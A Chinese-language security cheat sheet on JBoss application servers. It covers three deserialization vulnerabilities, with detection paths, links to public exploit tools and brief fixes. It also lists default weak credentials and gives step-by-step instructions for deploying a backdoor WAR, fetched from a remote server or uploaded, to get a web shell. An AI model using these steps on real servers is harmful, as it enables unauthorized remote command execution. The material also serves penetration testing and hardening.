中间件安全
JBoss
JBoss 是一个基于 J2EE 的开发源代码的应用服务器。 JBoss 代码遵循 LGPL 许可,可以在任何商业应用中免费使用。 JBoss 是一个管理 EJB 的容器和服务器,支
持 EJB1.1 、 EJB 2.0 和 EJB3 的规范。但 JBoss 核心服务不包括支持 servlet/JSP 的 WEB 容器,一般与 Tomcat 或 Jetty 绑定使用。
默认端口 :8080,9990
特定漏洞
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
影响范围:JBoss5.x/6.x
漏洞检测:/invoker/readonly 若显示HTTP status 500,则说明漏洞可能存在
漏洞利用:Jboss反序列化_CVE-2017-12149.jar
https://github.com/yunxu1/jboss-_CVE-2017-12149
漏洞修复:升级版本或不需要的http-invoker.sar组件,删除此组件
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
影响范围:JBoss 4.x
漏洞检测:/jbossmq-httpil/HTTPServerILServlet若访问200,则可能存在漏洞。
漏洞利用:全自动脚本
https://github.com/joaomatosf/jexboss
漏洞修复:升级版本
JMXInvokerServlet 反序列化漏洞
影响范围:Jboss 4.X
漏洞检测:/invoker/JMXInvokerServlet访问若提示下载,则可能存在漏洞。
漏洞利用:Jboss反序列化_CVE-2017-12149.jar(就是第一个利用工具)
https://github.com/yunxu1/jboss-_CVE-2017-12149
修复:升级版本
弱口令安全
Jboss4.x及其之前的版本 console 管理路径为/jmx-console/和/web-console/,密码存储:/opt/jboss/jboss4/server/default/conf/props/jmx-console-users.properties
Jboss5.x开始弃用了 web-console ,增加了admin-console,
Jboss5.x/6.x版本console路径为/jmx-console/和/admin-console/,密码存储:jboss/server/default/conf/props/jmx-console-users.properties
JBoos 4.X 弱口令管理后台部署war包getshell
弱口令:admin/admin
1.访问:yourIP:Port/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
2.生成war包部署自己服务器上:http://xxxx/cmd.war
3.找到void addURL(),在ParamValue填入我们远程的war包,点击invoke
4.提示成功后,访问/cmd/cmd.jsp触发后门
JBoos 5/6.X 弱口令管理后台部署war包getshell
弱口令:admin/vulhub
1.访问http://yourIP:Port/admin-console/login.seam,登录
2.Applications->Web Application (WAR)s->Add a new resource
3.生成war包,上传,确定
3.确定添加后,访问/cmd/cmd.jsp触发后门
危害
1.命令执行
2.权限丢失